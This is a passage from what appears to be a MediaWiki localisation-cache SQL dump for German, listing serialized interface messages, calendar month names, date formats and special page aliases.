Ybps\";'),('de','messages:editwatchlist-summary','s:0:\"\";'),('de','messages:iranian-calendar-m1','s:9:\"Farvardin\";'),('de','messages:iranian-calendar-m2','s:11:\"Ordibehesht\";'),('de','messages:iranian-calendar-m3','s:7:\"Khordad\";'),('de','messages:iranian-calendar-m4','s:3:\"Tir\";'),('de','messages:iranian-calendar-m5','s:6:\"Mordad\";'),('de','messages:iranian-calendar-m6','s:9:\"Shahrivar\";'),('de','messages:iranian-calendar-m7','s:4:\"Mehr\";'),('de','messages:iranian-calendar-m8','s:4:\"Aban\";'),('de','messages:iranian-calendar-m9','s:4:\"Azar\";'),('de','messages:iranian-calendar-m10','s:3:\"Dey\";'),('de','messages:iranian-calendar-m11','s:6:\"Bahman\";'),('de','messages:iranian-calendar-m12','s:6:\"Esfand\";'),('de','messages:hijri-calendar-m1','s:8:\"Muharram\";'),('de','messages:hijri-calendar-m2','s:5:\"Safar\";'),('de','messages:hijri-calendar-m9','s:7:\"Ramadan\";'),('de','messages:hebrew-calendar-m1','s:7:\"Tishrei\";'),('de','messages:hebrew-calendar-m2','s:8:\"Cheshvan\";'),('de','messages:hebrew-calendar-m3','s:6:\"Kislev\";'),('de','messages:hebrew-calendar-m4','s:5:\"Tevet\";'),('de','messages:hebrew-calendar-m5','s:6:\"Shevat\";'),('de','messages:hebrew-calendar-m6','s:4:\"Adar\";'),('de','messages:hebrew-calendar-m6a','s:6:\"Adar I\";'),('de','messages:hebrew-calendar-m6b','s:7:\"Adar II\";'),('de','messages:hebrew-calendar-m7','s:5:\"Nisan\";'),('de','messages:hebrew-calendar-m8','s:4:\"Iyar\";'),('de','messages:hebrew-calendar-m9','s:5:\"Sivan\";'),('de','messages:hebrew-calendar-m10','s:5:\"Tamuz\";'),('de','messages:hebrew-calendar-m11','s:2:\"Av\";'),('de','messages:hebrew-calendar-m12','s:4:\"Elul\";'),('de','messages:hebrew-calendar-m1-gen','s:7:\"Tishrei\";'),('de','messages:hebrew-calendar-m2-gen','s:8:\"Cheshvan\";'),('de','messages:hebrew-calendar-m3-gen','s:6:\"Kislev\";'),('de','messages:hebrew-calendar-m4-gen','s:5:\"Tevet\";'),('de','messages:hebrew-calendar-m5-gen','s:6:\"Shevat\";'),('de','messages:hebrew-calendar-m6-gen','s:4:\"Adar\";'),('de','messages:hebrew-calendar-m6a-gen','s:6:\"Adar I\";'),('de','messages:hebrew-calendar-m6b-gen','s:7:\"Adar II\";'),('de','messages:hebrew-calendar-m7-gen','s:5:\"Nisan\";'),('de','messages:hebrew-calendar-m8-gen','s:4:\"Iyar\";'),('de','messages:hebrew-calendar-m9-gen','s:5:\"Sivan\";'),('de','messages:hebrew-calendar-m10-gen','s:5:\"Tamuz\";'),('de','messages:hebrew-calendar-m11-gen','s:2:\"Av\";'),('de','messages:hebrew-calendar-m12-gen','s:4:\"Elul\";'),('de','messages:signature-anon','s:36:\"[[{{#special:Contributions}}/$1|$2]]\";'),('de','messages:timezone-utc','s:3:\"UTC\";'),('de','messages:version-summary','s:0:\"\";'),('de','messages:version-db-mysql-url','s:22:\"https://www.mysql.com/\";'),('de','messages:version-db-mariadb-url','s:20:\"https://mariadb.org/\";'),('de','messages:version-db-percona-url','s:46:\"http://www.percona.com/software/percona-server\";'),('de','messages:version-db-postgres-url','s:26:\"http://www.postgresql.org/\";'),('de','messages:version-db-oracle-url','s:31:\"http://www.oracle.com/database/\";'),('de','messages:version-db-sqlite-url','s:23:\"https://www.sqlite.org/\";'),('de','messages:version-db-mssql-url','s:30:\"https://www.microsoft.com/sql/\";'),('de','messages:version-entrypoints-index-php','s:78:\"[https://www.mediawiki.org/wiki/Special:MyLanguage/Manual:index.php index.php]\";'),('de','messages:version-entrypoints-api-php','s:74:\"[https://www.mediawiki.org/wiki/Special:MyLanguage/Manual:api.php api.php]\";'),('de','messages:version-entrypoints-load-php','s:76:\"[https://www.mediawiki.org/wiki/Special:MyLanguage/Manual:load.php load.php]\";'),('de','messages:redirect-text','s:0:\"\";'),('de','messages:specialpages-summary','s:0:\"\";'),('de','messages:tags-summary','s:0:\"\";'),('de','messages:comparepages-summary','s:0:\"\";'),('de','messages:revdelete-logentry','s:39:\"changed revision visibility of \"[[$1]]\"\";'),('de','messages:logdelete-logentry','s:36:\"changed event visibility of \"[[$1]]\"\";'),('de','messages:revdelete-content','s:7:\"content\";'),('de','messages:revdelete-summary','s:12:\"edit summary\";'),('de','messages:revdelete-uname','s:8:\"username\";'),('de','messages:revdelete-hid','s:6:\"hid $1\";'),('de','messages:revdelete-unhid','s:8:\"unhid $1\";'),('de','messages:revdelete-log-message','s:42:\"$1 for $2 {{PLURAL:$2|revision|revisions}}\";'),('de','messages:logdelete-log-message','s:36:\"$1 for $2 {{PLURAL:$2|event|events}}\";'),('de','messages:deletedarticle','s:16:\"deleted \"[[$1]]\"\";'),('de','messages:suppressedarticle','s:19:\"suppressed \"[[$1]]\"\";'),('de','messages:undeletedarticle','s:17:\"restored \"[[$1]]\"\";'),('de','messages:patrol-log-line','s:28:\"marked $1 of $2 patrolled $3\";'),('de','messages:patrol-log-auto','s:11:\"(automatic)\";'),('de','messages:patrol-log-diff','s:11:\"revision $1\";'),('de','messages:1movedto2','s:22:\"moved [[$1]] to [[$2]]\";'),('de','messages:1movedto2_redir','s:36:\"moved [[$1]] to [[$2]] over redirect\";'),('de','messages:move-redirect-suppressed','s:19:\"redirect suppressed\";'),('de','messages:newuserlog-create-entry','s:16:\"New user account\";'),('de','messages:newuserlog-create2-entry','s:22:\"created new account $1\";'),('de','messages:newuserlog-autocreate-entry','s:29:\"Account created automatically\";'),('de','messages:rightslogentry','s:45:\"changed group membership for $1 from $2 to $3\";'),('de','messages:rightslogentry-autopromote','s:40:\"was automatically promoted from $2 to $3\";'),('de','messages:limitreport-expensivefunctioncount-value','s:5:\"$1/$2\";'),('de','messages:expand_templates_preview_fail_html','s:318:\"Because {{SITENAME}} has raw HTML enabled and there was a loss of session data, the preview is hidden as a precaution against JavaScript attacks.\n\nIf this is a legitimate preview attempt, please try again.\nIf it still does not work, try [[Special:UserLogout|logging out]] and logging back in.\";'),('de','messages:expand_templates_preview_fail_html_anon','s:253:\"Because {{SITENAME}} has raw HTML enabled and you are not logged in, the preview is hidden as a precaution against JavaScript attacks.\n\nIf this is a legitimate preview attempt, please [[Special:UserLogin|log in]] and try again.\";'),('de','messages:mediastatistics-nfiles','s:8:\"$1 ($2%)\";'),('de','messages:json-warn-trailing-comma','s:65:\"$1 trailing {{PLURAL:$1|comma was|commas were}} removed from JSON\";'),('de','messages:json-error-unknown','s:44:\"There was a problem with the JSON. Error: $1\";'),('de','messages:json-error-depth','s:41:\"The maximum stack depth has been exceeded\";'),('de','messages:json-error-state-mismatch','s:25:\"Invalid or malformed JSON\";'),('de','messages:json-error-ctrl-char','s:53:\"Control character error, possibly incorrectly encoded\";'),('de','messages:json-error-syntax','s:12:\"Syntax error\";'),('de','messages:json-error-utf8','s:56:\"Malformed UTF-8 characters, possibly incorrectly encoded\";'),('de','messages:json-error-recursion','s:59:\"One or more recursive references in the value to be encoded\";'),('de','messages:json-error-inf-or-nan','s:56:\"One or more NAN or INF values in the value to be encoded\";'),('de','messages:json-error-unsupported-type','s:50:\"A value of a type that cannot be encoded was given\";'),('de','messages:wikieditor-toolbar-tool-table-example-text','s:216:\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut nec purus diam. Sed aliquam imperdiet nunc quis lacinia. Donec rutrum consectetur placerat. Sed volutpat neque non purus faucibus id ultricies enim euismod.\";'),('de','messages:wikieditor-toolbar-help-content-rereference-syntax','s:25:\"<ref name=\"test\" />\";'),('de','messages:wikieditor-toolbar-help-content-showreferences-syntax','s:20:\"<references />\";'),('de','messages:wikieditor-toolbar-help-content-signaturetimestamp-syntax','s:4:\"~~~~\";'),('de','messages:wikieditor-toolbar-help-content-signature-syntax','s:3:\"~~~\";'),('de','rtl','b:0;'),('de','capitalizeAllNouns','b:1;'),('de','digitTransformTable','N;'),('de','separatorTransformTable','a:2:{s:1:\",\";s:1:\".\";s:1:\".\";s:1:\",\";}'),('de','fallback8bitEncoding','s:12:\"windows-1252\";'),('de','linkPrefixExtension','b:0;'),('de','linkTrail','s:27:\"/^([äöüßa-z]+)(.*)$/sDu\";'),('de','linkPrefixCharset','s:23:\"a-zA-Z\\x{80}-\\x{10ffff}\";'),('de','namespaceAliases','a:2:{s:4:\"Bild\";i:6;s:15:\"Bild_Diskussion\";i:7;}'),('de','dateFormats','a:26:{s:9:\"dmyt time\";s:3:\"H:i\";s:9:\"dmyt date\";s:6:\"j. F Y\";s:9:\"dmyt both\";s:11:\"j. M Y, H:i\";s:10:\"dmyts time\";s:5:\"H:i:s\";s:10:\"dmyts date\";s:6:\"j. F Y\";s:10:\"dmyts both\";s:13:\"j. M Y, H:i:s\";s:8:\"dmy time\";s:3:\"H:i\";s:8:\"dmy date\";s:6:\"j. F Y\";s:8:\"dmy both\";s:11:\"H:i, j. M Y\";s:8:\"ymd time\";s:3:\"H:i\";s:8:\"ymd date\";s:5:\"Y M j\";s:8:\"ymd both\";s:10:\"H:i, Y M j\";s:13:\"ISO 8601 time\";s:11:\"xnH:xni:xns\";s:13:\"ISO 8601 date\";s:11:\"xnY-xnm-xnd\";s:13:\"ISO 8601 both\";s:25:\"xnY-xnm-xnd\"T\"xnH:xni:xns\";s:8:\"mdy time\";s:3:\"H:i\";s:8:\"mdy date\";s:6:\"F j, Y\";s:13:\"mdy monthonly\";s:3:\"F Y\";s:8:\"mdy both\";s:11:\"H:i, F j, Y\";s:10:\"mdy pretty\";s:3:\"F j\";s:13:\"dmy monthonly\";s:3:\"F Y\";s:10:\"dmy pretty\";s:3:\"j F\";s:13:\"ymd monthonly\";s:3:\"Y F\";s:10:\"ymd pretty\";s:3:\"F j\";s:18:\"ISO 8601 monthonly\";s:7:\"xnY-xnm\";s:15:\"ISO 8601 pretty\";s:7:\"xnm-xnd\";}'),('de','datePreferences','a:6:{i:0;s:7:\"default\";i:1;s:4:\"dmyt\";i:2;s:5:\"dmyts\";i:3;s:3:\"dmy\";i:4;s:3:\"ymd\";i:5;s:8:\"ISO 8601\";}'),('de','datePreferenceMigrationMap','a:4:{i:0;s:7:\"default\";i:1;s:3:\"mdy\";i:2;s:3:\"dmy\";i:3;s:3:\"ymd\";}'),('de','defaultDateFormat','s:3:\"dmy\";'),('de','extraUserToggles','a:0:{}'),('de','specialPageAliases','a:110:{s:11:\"Activeusers\";a:2:{i:0;s:15:\"Aktive_Benutzer\";i:1;s:11:\"ActiveUsers\";}s:11:\"Allmessages\";a:3:{i:0;s:27:\"MediaWiki-Systemnachrichten\";i:1;s:17:\"Systemnachrichten\";i:2;s:11:\"AllMessages\";}s:12:\"AllMyUploads\";a:3:{i:0;s:18:\"Alle_meine_Dateien\";i:1;s:12:\"AllMyUploads\";i:2;s:10:\"AllMyFiles\";}s:8:\"Allpages\";a:2:{i:0;s:11:\"Alle_Seiten\";i:1;s:8:\"AllPages\";}s:12:\"Ancientpages\";a:2:{i:0;s:15:\"Älteste_Seiten\";i:1;s:12:\"AncientPages\";}s:8:\"Badtitle\";a:2:{i:0;s:22:\"Ungültiger_Seitenname\";i:1;s:8:\"Badtitle\";}s:9:\"Blankpage\";a:3:{i:0;s:9:\"Leerseite\";i:1;s:11:\"Leere_Seite\";i:2;s:9:\"BlankPage\";}s:5:\"Block\";a:4:{i:0;s:7:\"Sperren\";i:1;s:5:\"Block\";i:2;s:7:\"BlockIP\";i:3;s:9:\"BlockUser\";}s:11:\"Booksources\";a:2:{i:0;s:10:\"ISBN-Suche\";i:1;s:11:\"BookSources\";}s:15:\"BrokenRedirects\";a:3:{i:0;s:23:\"Defekte_Weiterleitungen\";i:1;s:23:\"Kaputte_Weiterleitungen\";i:2;s:15:\"BrokenRedirects\";}s:10:\"Categories\";a:2:{i:0;s:10:\"Kategorien\";i:1;s:10:\"Categories\";}s:11:\"ChangeEmail\";a:2:{i:0;s:22:\"E-Mail-Adresse_ändern\";i:1;s:11:\"ChangeEmail\";}s:14:\"ChangePassword\";a:5:{i:0;s:16:\"Passwort_ändern\";i:1;s:22:\"Passwort_zurücksetzen\";i:2;s:14:\"ChangePassword\";i:3;s:9:\"ResetPass\";i:4;s:13:\"ResetPassword\";}s:12:\"ComparePages\";a:2:{i:0;s:18:\"Seiten_vergleichen\";i:1;s:12:\"ComparePages\";}s:12:\"Confirmemail\";a:3:{i:0;s:18:\"E-Mail_bestätigen\";i:1;s:18:\"E-Mail_bestaetigen\";i:2;s:12:\"ConfirmEmail\";}s:13:\"Contributions\";a:3:{i:0;s:9:\"Beiträge\";i:1;s:13:\"Contributions\";i:2;s:8:\"Contribs\";}s:13:\"CreateAccount\";a:2:{i:0;s:21:\"Benutzerkonto_anlegen\";i:1;s:13:\"CreateAccount\";}s:12:\"Deadendpages\";a:2:{i:0;s:16:\"Sackgassenseiten\";i:1;s:12:\"DeadendPages\";}s:20:\"DeletedContributions\";a:2:{i:0;s:20:\"Gelöschte_Beiträge\";i:1;s:20:\"DeletedContributions\";}s:15:\"DoubleRedirects\";a:2:{i:0;s:24:\"Doppelte_Weiterleitungen\";i:1;s:15:\"DoubleRedirects\";}s:13:\"EditWatchlist\";a:2:{i:0;s:28:\"Beobachtungsliste_bearbeiten\";i:1;s:13:\"EditWatchlist\";}s:9:\"Emailuser\";a:5:{i:0;s:13:\"E-Mail_senden\";i:1;s:6:\"Mailen\";i:2;s:6:\"E-Mail\";i:3;s:9:\"EmailUser\";i:4;s:5:\"Email\";}s:15:\"ExpandTemplates\";a:2:{i:0;s:20:\"Vorlagen_expandieren\";i:1;s:15:\"ExpandTemplates\";}s:6:\"Export\";a:2:{i:0;s:11:\"Exportieren\";i:1;s:6:\"Export\";}s:15:\"Fewestrevisions\";a:2:{i:0;s:25:\"Wenigstbearbeitete_Seiten\";i:1;s:15:\"FewestRevisions\";}s:19:\"FileDuplicateSearch\";a:3:{i:0;s:18:\"Dateiduplikatsuche\";i:1;s:20:\"Datei-Duplikat-Suche\";i:2;s:19:\"FileDuplicateSearch\";}s:8:\"Filepath\";a:2:{i:0;s:9:\"Dateipfad\";i:1;s:8:\"FilePath\";}s:6:\"Import\";a:2:{i:0;s:11:\"Importieren\";i:1;s:6:\"Import\";}s:15:\"Invalidateemail\";a:3:{i:0;s:24:\"E-Mail_nicht_bestätigen\";i:1;s:24:\"E-Mail_nicht_bestaetigen\";i:2;s:15:\"InvalidateEmail\";}s:14:\"JavaScriptTest\";a:2:{i:0;s:15:\"JavaScript-Test\";i:1;s:14:\"JavaScriptTest\";}s:9:\"BlockList\";a:7:{i:0;s:17:\"Liste_der_Sperren\";i:1;s:21:\"Gesperrte_IP-Adressen\";i:2;s:13:\"Gesperrte_IPs\";i:3;s:10:\"Sperrliste\";i:4;s:9:\"BlockList\";i:5;s:10:\"ListBlocks\";i:6;s:11:\"IPBlockList\";}s:10:\"LinkSearch\";a:3:{i:0;s:12:\"Weblinksuche\";i:1;s:13:\"Weblink-Suche\";i:2;s:10:\"LinkSearch\";}s:10:\"Listadmins\";a:2:{i:0;s:15:\"Administratoren\";i:1;s:10:\"ListAdmins\";}s:8:\"Listbots\";a:2:{i:0;s:4:\"Bots\";i:1;s:8:\"ListBots\";}s:9:\"Listfiles\";a:5:{i:0;s:7:\"Dateien\";i:1;s:10:\"Dateiliste\";i:2;s:9:\"ListFiles\";i:3;s:8:\"FileList\";i:4;s:9:\"ImageList\";}s:15:\"Listgrouprights\";a:3:{i:0;s:13:\"Gruppenrechte\";i:1;s:15:\"ListGroupRights\";i:2;s:15:\"UserGroupRights\";}s:13:\"Listredirects\";a:2:{i:0;s:15:\"Weiterleitungen\";i:1;s:13:\"ListRedirects\";}s:9:\"Listusers\";a:4:{i:0;s:8:\"Benutzer\";i:1;s:13:\"Benutzerliste\";i:2;s:9:\"ListUsers\";i:3;s:8:\"UserList\";}s:6:\"Lockdb\";a:2:{i:0;s:17:\"Datenbank_sperren\";i:1;s:6:\"LockDB\";}s:3:\"Log\";a:3:{i:0;s:7:\"Logbuch\";i:1;s:3:\"Log\";i:2;s:4:\"Logs\";}s:11:\"Lonelypages\";a:3:{i:0;s:16:\"Verwaiste_Seiten\";i:1;s:11:\"LonelyPages\";i:2;s:13:\"OrphanedPages\";}s:9:\"Longpages\";a:2:{i:0;s:15:\"Längste_Seiten\";i:1;s:9:\"LongPages\";}s:12:\"MergeHistory\";a:2:{i:0;s:28:\"Versionsgeschichten_vereinen\";i:1;s:12:\"MergeHistory\";}s:10:\"MIMEsearch\";a:2:{i:0;s:14:\"MIME-Typ-Suche\";i:1;s:10:\"MIMESearch\";}s:14:\"Mostcategories\";a:2:{i:0;s:26:\"Meistkategorisierte_Seiten\";i:1;s:14:\"MostCategories\";}s:10:\"Mostimages\";a:4:{i:0;s:21:\"Meistbenutzte_Dateien\";i:1;s:15:\"MostLinkedFiles\";i:2;s:9:\"MostFiles\";i:3;s:10:\"MostImages\";}s:14:\"Mostinterwikis\";a:2:{i:0;s:21:\"Meiste_Interwikilinks\";i:1;s:14:\"MostInterwikis\";}s:10:\"Mostlinked\";a:3:{i:0;s:21:\"Meistverlinkte_Seiten\";i:1;s:15:\"MostLinkedPages\";i:2;s:10:\"MostLinked\";}s:20:\"Mostlinkedcategories\";a:3:{i:0;s:24:\"Meistbenutzte_Kategorien\";i:1;s:20:\"MostLinkedCategories\";i:2;s:18:\"MostUsedCategories\";}s:19:\"Mostlinkedtemplates\";a:4:{i:0;s:22:\"Meistbenutzte_Vorlagen\";i:1;s:20:\"MostTranscludedPages\";i:2;s:19:\"MostLinkedTemplates\";i:3;s:17:\"MostUsedTemplates\";}s:13:\"Mostrevisions\";a:2:{i:0;s:23:\"Meistbearbeitete_Seiten\";i:1;s:13:\"MostRevisions\";}s:8:\"Movepage\";a:2:{i:0;s:11:\"Verschieben\";i:1;s:8:\"MovePage\";}s:15:\"Mycontributions\";a:2:{i:0;s:15:\"Meine_Beiträge\";i:1;s:15:\"MyContributions\";}s:10:\"MyLanguage\";a:2:{i:0;s:13:\"Meine_Sprache\";i:1;s:10:\"MyLanguage\";}s:6:\"Mypage\";a:2:{i:0;s:19:\"Meine_Benutzerseite\";i:1;s:6:\"MyPage\";}s:6:\"Mytalk\";a:2:{i:0;s:22:\"Meine_Diskussionsseite\";i:1;s:6:\"MyTalk\";}s:9:\"Myuploads\";a:3:{i:0;s:27:\"Meine_hochgeladenen_Dateien\";i:1;s:9:\"MyUploads\";i:2;s:7:\"MyFiles\";}s:9:\"Newimages\";a:3:{i:0;s:12:\"Neue_Dateien\";i:1;s:8:\"NewFiles\";i:2;s:9:\"NewImages\";}s:8:\"Newpages\";a:2:{i:0;s:11:\"Neue_Seiten\";i:1;s:8:\"NewPages\";}s:13:\"PagesWithProp\";a:5:{i:0;s:24:\"Seiten_mit_Eigenschaften\";i:1;s:13:\"PagesWithProp\";i:2;s:13:\"Pageswithprop\";i:3;s:11:\"PagesByProp\";i:4;s:11:\"Pagesbyprop\";}s:13:\"PasswordReset\";a:2:{i:0;s:21:\"Passwort_neu_vergeben\";i:1;s:13:\"PasswordReset\";}s:13:\"PermanentLink\";a:4:{i:0;s:16:\"Permanenter_Link\";i:1;s:9:\"Permalink\";i:2;s:13:\"PermanentLink\";i:3;s:9:\"PermaLink\";}s:12:\"Popularpages\";a:2:{i:0;s:18:\"Beliebteste_Seiten\";i:1;s:12:\"PopularPages\";}s:11:\"Preferences\";a:2:{i:0;s:13:\"Einstellungen\";i:1;s:11:\"Preferences\";}s:11:\"Prefixindex\";a:2:{i:0;s:12:\"Präfixindex\";i:1;s:11:\"PrefixIndex\";}s:14:\"Protectedpages\";a:2:{i:0;s:18:\"Geschützte_Seiten\";i:1;s:14:\"ProtectedPages\";}s:15:\"Protectedtitles\";a:3:{i:0;s:17:\"Geschützte_Titel\";i:1;s:15:\"Gesperrte_Titel\";i:2;s:15:\"ProtectedTitles\";}s:10:\"Randompage\";a:3:{i:0;s:16:\"Zufällige_Seite\";i:1;s:6:\"Random\";i:2;s:10:\"RandomPage\";}s:16:\"RandomInCategory\";a:2:{i:0;s:29:\"Zufällige_Seite_in_Kategorie\";i:1;s:16:\"RandomInCategory\";}s:14:\"Randomredirect\";a:2:{i:0;s:24:\"Zufällige_Weiterleitung\";i:1;s:14:\"RandomRedirect\";}s:13:\"Recentchanges\";a:2:{i:0;s:18:\"Letzte_Änderungen\";i:1;s:13:\"RecentChanges\";}s:19:\"Recentchangeslinked\";a:3:{i:0;s:32:\"Änderungen_an_verlinkten_Seiten\";i:1;s:19:\"RecentChangesLinked\";i:2;s:14:\"RelatedChanges\";}s:8:\"Redirect\";a:2:{i:0;s:13:\"Weiterleitung\";i:1;s:8:\"Redirect\";}s:11:\"ResetTokens\";a:2:{i:0;s:20:\"Tokens_zurücksetzen\";i:1;s:11:\"ResetTokens\";}s:14:\"Revisiondelete\";a:2:{i:0;s:17:\"Versionslöschung\";i:1;s:14:\"RevisionDelete\";}s:6:\"Search\";a:2:{i:0;s:5:\"Suche\";i:1;s:6:\"Search\";}s:10:\"Shortpages\";a:2:{i:0;s:16:\"Kürzeste_Seiten\";i:1;s:10:\"ShortPages\";}s:12:\"Specialpages\";a:2:{i:0;s:13:\"Spezialseiten\";i:1;s:12:\"SpecialPages\";}s:10:\"Statistics\";a:2:{i:0;s:9:\"Statistik\";i:1;s:10:\"Statistics\";}s:4:\"Tags\";a:2:{i:0;s:12:\"Markierungen\";i:1;s:4:\"Tags\";}s:7:\"Unblock\";a:2:{i:0;s:9:\"Freigeben\";i:1;s:7:\"Unblock\";}s:23:\"Uncategorizedcategories\";a:2:{i:0;s:31:\"Nicht_kategorisierte_Kategorien\";i:1;s:23:\"UncategorizedCategories\";}s:19:\"Uncategorizedimages\";a:3:{i:0;s:28:\"Nicht_kategorisierte_Dateien\";i:1;s:18:\"UncategorizedFiles\";i:2;s:19:\"UncategorizedImages\";}s:18:\"Uncategorizedpages\";a:2:{i:0;s:27:\"Nicht_kategorisierte_Seiten\";i:1;s:18:\"UncategorizedPages\";}s:22:\"Uncategorizedtemplates\";a:2:{i:0;s:29:\"Nicht_kategorisierte_Vorlagen\";i:1;s:22:\"UncategorizedTemplates\";}s:8:\"Undelete\";a:2:{i:0;s:16:\"Wiederherstellen\";i:1;s:8:\"Undelete\";}s:8:\"Unlockdb\";a:2:{i:0;s:20:\"Datenbank_entsperren\";i:1;s:8:\"UnlockDB\";}s:16:\"Unusedcategories\";a:2:{i:0;s:21:\"Unbenutzte_Kategorien\";i:1;s:16:\"UnusedCategories\";}s:12:\"Unusedimages\";a:3:{i:0;s:18:\"Unbenutzte_Dateien\";i:1;s:11:\"UnusedFiles\";i:2;s:12:\"UnusedImages\";}s:15:\"Unusedtemplates\";a:2:{i:0;s:19:\"Unbenutzte_Vorlagen\";i:1;s:15:\"UnusedTemplates\";}s:14:\"Unwatchedpages\";a:3:{i:0;s:17:\"Ignorierte_Seiten\";i:1;s:20:\"Unbeobachtete_Seiten\";i:2;s:14:\"UnwatchedPages\";}s:6:\"Upload\";a:2:{i:0;s:9:\"Hochladen\";i:1;s:6:\"Upload\";}s:11:\"UploadStash\";a:2:{i:0;s:16:\"Hochladespeicher\";i:1;s:11:\"UploadStash\";}s:9:\"Userlogin\";a:3:{i:0;s:8:\"Anmelden\";i:1;s:9:\"UserLogin\";i:2;s:5:\"Login\";}s:10:\"Userlogout\";a:3:{i:0;s:8:\"Abmelden\";i:1;s:10:\"UserLogout\";i:2;s:6:\"Logout\";}s:10:\"Userrights\";a:4:{i:0;s:14:\"Benutzerrechte\";i:1;s:10:\"UserRights\";i:2;s:9:\"MakeSysop\";i:3;s:7:\"MakeBot\";}s:16:\"Wantedcategories\";a:2:{i:0;s:22:\"Gewünschte_Kategorien\";i:1;s:16:\"WantedCategories\";}s:11:\"Wantedfiles\";a:3:{i:0;s:19:\"Gewünschte_Dateien\";i:1;s:16:\"Fehlende_Dateien\";i:2;s:11:\"WantedFiles\";}s:11:\"Wantedpages\";a:3:{i:0;s:18:\"Gewünschte_Seiten\";i:1;s:11:\"WantedPages\";i:2;s:11:\"BrokenLinks\";}s:15:\"Wantedtemplates\";a:3:{i:0;s:20:\"Gewünschte_Vorlagen\";i:1;s:17:\"Fehlende_Vorlagen\";i:2;s:15:\"WantedTemplates\";}s:9:\"Watchlist\";a:2:{i:0;s:17:\"Beobachtungsliste\";i:1;s:9:\"Watchlist\";}s:13:\"Whatlinkshere\";a:3:{i:0;s:9:\"Linkliste\";i:1;s:12:\"Verweisliste\";i:2;s:13:\"WhatLinksHere\";}s:16:\"Withoutinterwiki\";a:2:{i:0;s:19:\"Fehlende_Interwikis\";i:1;s:16:\"WithoutInterwiki\";}s:4:\"Diff\";a:1:{i:0;s:4:\"Diff\";}s:19:\"ListDuplicatedFiles\";a:2:{i:0;s:19:\"ListDuplicatedFiles\";i:1;s:18:\"ListFileDuplicates\";}s:15:\"MediaStatistics\";a:1:{i:0;s:15:\"MediaStatistics\";}s:12:\"PageLanguage\";a:1:{i:0;s:12:\"PageLanguage\";}s:7:\"RunJobs\";a:1:{i:0;s:7:\"RunJobs\";}s:18:\"TrackingCategories\";a:1:{i:0;s:18:\"TrackingCategories\";}s:7:\"Version\";a:1:{i:0;s:7:\"Version\";}}'),('de','imageFiles','a:10:{s:11:\"button-bold\";s:18:\"de/button_bold.png\";s:13:\"button-italic\";s:20:\"de/button_italic.png\";s:11:\"button-link\";s:18:\"en/button_link.png\";s:14:\"button-extlink\";s:21:\"en/button_extlink.png\";s:15:\"button-headline\";s:22:\"en/button_headline.png\";s:12:\"button-image\";s:19:\"en/button_image.png\";s:12:\"button-media\";s:19:\"en/button_media.png\";s:13:\"button-nowiki\";s:20:\"en/button_nowiki.png\";s:10:\"button-sig\";s:17:\"en/button_sig.png\";s:9:\"button-hr\";s:16:\"en/button_hr.png\";}'),('de','preloadedMessages','a:104:{i:0;s:9:\"aboutpage\";i:1;s:9:\"aboutsite\";i:2;s:17:\"accesskey-ca-edit\";i:3;s:20:\"accesskey-ca-history\";i:4;s:23:\"accesskey-ca-nstab-main\";i:5;s:17:\"accesskey-ca-talk\";i:6;s:17:\"accesskey-ca-view\";i:7;s:25:\"accesskey-n-currentevents\";i:8;s:16:\"accesskey-n-help\";i:9;s:32:\"accesskey-n-mainpage-description\";i:10;s:18:\"accesskey-n-portal\";i:11;s:22:\"accesskey-n-randompage\";i:12;s:25:\"accesskey-n-recentchanges\";i:13;s:16:\"accesskey-p-logo\";i:14;s:18:\"accesskey-pt-login\";i:15;s:16:\"accesskey-search\";i:16;s:25:\"accesskey-search-fulltext\";i:17;s:19:\"accesskey-search-go\";i:18;s:21:\"accesskey-t-permalink\";i:19;s:31:\"accesskey-t-recentchangeslinked\";i:20;s:24:\"accesskey-t-specialpages\";i:21;s:25:\"accesskey-t-whatlinkshere\";i:22;s:7:\"actions\";i:23;s:10:\"anonnotice\";i:24;s:13:\"currentevents\";i:25;s:17:\"currentevents-url\";i:26;s:14:\"disclaimerpage\";i:27;s:11:\"disclaimers\";i:28;s:4:\"edit\";i:29;s:11:\"editsection\";i:30;s:15:\"editsectionhint\";i:31;s:4:\"help\";i:32;s:8:\"helppage\";i:33;s:24:\"interlanguage-link-title\";i:34;s:6:\"jumpto\";i:35;s:16:\"jumptonavigation\";i:36;s:12:\"jumptosearch\";i:37;s:14:\"lastmodifiedat\";i:38;s:8:\"mainpage\";i:39;s:20:\"mainpage-description\";i:40;s:14:\"mainpage-nstab\";i:41;s:10:\"namespaces\";i:42;s:10:\"navigation\";i:43;s:23:\"nav-login-createaccount\";i:44;s:10:\"nstab-main\";i:45;s:10:\"nstab-talk\";i:46;s:15:\"opensearch-desc\";i:47;s:14:\"pagecategories\";i:48;s:18:\"pagecategorieslink\";i:49;s:9:\"pagetitle\";i:50;s:23:\"pagetitle-view-mainpage\";i:51;s:9:\"permalink\";i:52;s:13:\"personaltools\";i:53;s:6:\"portal\";i:54;s:10:\"portal-url\";i:55;s:16:\"printableversion\";i:56;s:7:\"privacy\";i:57;s:11:\"privacypage\";i:58;s:10:\"randompage\";i:59;s:14:\"randompage-url\";i:60;s:13:\"recentchanges\";i:61;s:27:\"recentchangeslinked-toolbox\";i:62;s:17:\"recentchanges-url\";i:63;s:13:\"retrievedfrom\";i:64;s:6:\"search\";i:65;s:13:\"searcharticle\";i:66;s:12:\"searchbutton\";i:67;s:7:\"sidebar\";i:68;s:18:\"navigation-heading\";i:69;s:14:\"site-atom-feed\";i:70;s:10:\"sitenotice\";i:71;s:12:\"specialpages\";i:72;s:7:\"tagline\";i:73;s:4:\"talk\";i:74;s:7:\"toolbox\";i:75;s:15:\"tooltip-ca-edit\";i:76;s:18:\"tooltip-ca-history\";i:77;s:21:\"tooltip-ca-nstab-main\";i:78;s:15:\"tooltip-ca-talk\";i:79;s:15:\"tooltip-ca-view\";i:80;s:23:\"tooltip-n-currentevents\";i:81;s:14:\"tooltip-n-help\";i:82;s:30:\"tooltip-n-mainpage-description\";i:83;s:16:\"tooltip-n-portal\";i:84;s:20:\"tooltip-n-randompage\";i:85;s:23:\"tooltip-n-recentchanges\";i:86;s:14:\"tooltip-p-logo\";i:87;s:20:\"tooltip-p-navigation\";i:88;s:12:\"tooltip-p-tb\";i:89;s:16:\"tooltip-pt-login\";i:90;s:14:\"tooltip-search\";i:91;s:23:\"tooltip-search-fulltext\";i:92;s:17:\"tooltip-search-go\";i:93;s:19:\"tooltip-t-permalink\";i:94;s:29:\"tooltip-t-recentchangeslinked\";i:95;s:22:\"tooltip-t-specialpages\";i:96;s:23:\"tooltip-t-whatlinkshere\";i:97;s:8:\"variants\";i:98;s:16:\"vector-view-edit\";i:99;